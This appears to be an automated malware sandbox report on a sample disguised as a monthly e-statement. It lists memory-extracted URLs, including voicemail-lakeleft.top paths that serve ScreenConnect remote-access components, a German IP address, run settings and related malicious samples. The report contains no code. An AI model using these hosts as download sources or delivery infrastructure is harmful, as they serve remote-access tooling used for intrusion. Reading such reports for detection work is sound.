                                                                                        http://Passport.NET/tb_svchost.exe, 0000000E.00000002.3156215845.000002094E4B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3158220210.000002094F299000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://login.livesvchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllPxdfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileMadfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://account.live.com/msangcwamsvchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.w3.ordfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B414C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.ver)svchost.exe, 00000004.00000002.2920493879.0000019A7EE00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://passport.net/tbsvchost.exe, 0000000E.00000002.3158220210.000002094F281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157944399.000002094F200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155699966.000002094E483000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156686908.000002094E4EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://g.live.com/odclientsettings/Prod1C:edb.log.4.drfalse
                                                                                                                high
                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%dfsvc.exe, 00000001.00000002.3176665958.000001E8CDEBF000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570147020.000000001BA61000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570020021.000000001BA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageSXdfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuersvchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://voicemail-lakeleft.topdfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trustnsvchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe&dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:svchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exxdfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applScreenConnect.WindowsClient.exe, 00000007.00000002.1569247081.0000000001764000.00000004.00000020.00020000.00000000.sdmp, S0AMH0XA.log.1.drfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurisvchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.3176169925.000001E8CDE00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.000000000129F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.0000000001331000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570200570.000000001BAC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application.6ZZfsAdfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000000E.00000003.1874139847.000002094F233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://Passport.NET/STSsvchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.w3.svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsAAAAsvchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config.dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exeXdfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://Passport.NET/tbsvchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationtdfsvc.exe, 00000001.00000002.3176665958.000001E8CDE88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 0000000E.00000003.1698574319.000002094ED27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://signup.live.com/signup.aspxsvchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsCldfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.1295464870.0000019A7F000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.13.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Screedfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            194.59.30.201
                                                                                                                                                                                                            voicemail-lakeleft.topGermany
                                                                                                                                                                                                            30823COMBAHTONcombahtonGmbHDEfalse
                                                                                                                                                                                                            IP
                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1551950
                                                                                                                                                                                                            Start date and time:2024-11-08 11:08:18 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 8m 47s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal51.evad.winEXE@19/76@3/2
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 83.3%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 77%
                                                                                                                                                                                                            • Number of executed functions: 112
                                                                                                                                                                                                            • Number of non-executed functions: 26
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.101.57.9, 199.232.210.172, 184.28.90.27, 192.229.221.95, 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.72, 40.126.32.138, 40.126.32.134, 20.190.160.14, 40.126.32.74, 20.189.173.21
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                            • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7484 because it is empty
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            06:44:35API Interceptor5248414x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            194.59.30.2019YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          75kTq6Y4Ck.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              popwee2.zapto.org9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              voicemail-lakeleft.top9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
